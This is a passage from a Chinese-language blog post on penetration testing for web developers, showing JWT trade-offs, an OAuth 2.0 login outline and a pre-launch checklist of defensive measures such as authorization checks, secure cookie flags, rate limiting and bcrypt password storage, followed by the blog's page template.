<p><strong>优点</strong>是无状态、适合分布式、移动端友好但是无法主动注销（只能等过期）、JWT 被偷就凉了</p>
<h3 id="OAuth-2-0（第三方登录）"><a href="#OAuth-2-0（第三方登录）" class="headerlink" title="OAuth 2.0（第三方登录）"></a>OAuth 2.0（第三方登录）</h3><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">用户点“用 Google 登录” → 跳转到 Google → 授权后跳回来 → 你拿到用户信息<br></code></pre></td></tr></table></figure>

<p><strong>推荐可以用 Google、GitHub、微信扫码登录，不要自己存密码。省去了密码加密、找回密码、防止撞库等一系列麻烦。</strong></p>
<p>总之上线前，逐条确认：</p>
<ul>
<li><input disabled="" type="checkbox"> 所有需要登录的接口，都校验了 session&#x2F;JWT</li>
<li><input disabled="" type="checkbox"> 所有涉及资源的接口（如 <code>/order/123</code>），都校验了当前用户是否有权访问该资源</li>
<li><input disabled="" type="checkbox"> 没有用自增 ID 直接暴露给前端（或做了权限校验）</li>
<li><input disabled="" type="checkbox"> Cookie 设置了 <code>HttpOnly</code>、<code>Secure</code>、<code>SameSite=Lax</code></li>
<li><input disabled="" type="checkbox"> JWT 使用了强密钥，过期时间不超过 1 天（建议 1-2 小时 + refresh）</li>
<li><input disabled="" type="checkbox"> 登录接口有频率限制</li>
<li><input disabled="" type="checkbox"> 密码重置 token 是随机生成、短时效、一次性</li>
<li><input disabled="" type="checkbox"> 不使用 Basic Auth 暴露密码</li>
<li><input disabled="" type="checkbox"> 全站 HTTPS</li>
<li><input disabled="" type="checkbox"> 密码存储用 bcrypt 或 argon2（不要用 MD5）</li>
<li><input disabled="" type="checkbox"> 必要时针对请求参数进行前端加密处理</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%85%A8%E6%A0%88%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/" class="category-chain-item">全栈应用开发</a>
  
  
    <span>></span>
    
  <a href="/categories/%E5%85%A8%E6%A0%88%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/%E8%BF%90%E7%BB%B4/" class="category-chain-item">运维</a>
  
  
    <span>></span>
    
  <a href="/categories/%E5%85%A8%E6%A0%88%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/%E8%BF%90%E7%BB%B4/%E5%AE%89%E5%85%A8%E6%9C%8D%E5%8A%A1/" class="category-chain-item">安全服务</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>渗透测试</div>
      <div>https://hermes37.vercel.app/2026/04/03/全栈应用开发/运维/安全服务/渗透测试/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Ling</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月3日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/04/04/%E6%91%98%E5%BD%95%E4%B8%8E%E9%9A%8F%E7%AC%94/%E5%85%B4%E8%B6%A3/%E8%AF%AD%E8%A8%80/%E8%A5%BF%E8%AF%AD/%E9%98%85%E8%AF%BB/" title="阅读">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">阅读</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/03/%E5%85%A8%E6%A0%88%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/%E8%BF%90%E7%BB%B4/Linux%E8%BF%90%E7%BB%B4/Shell%E8%84%9A%E6%9C%AC%E5%9F%BA%E7%A1%80/" title="Shell脚本基础">
                        <span class="hidden-mobile">Shell脚本基础</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/toc-toggle.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
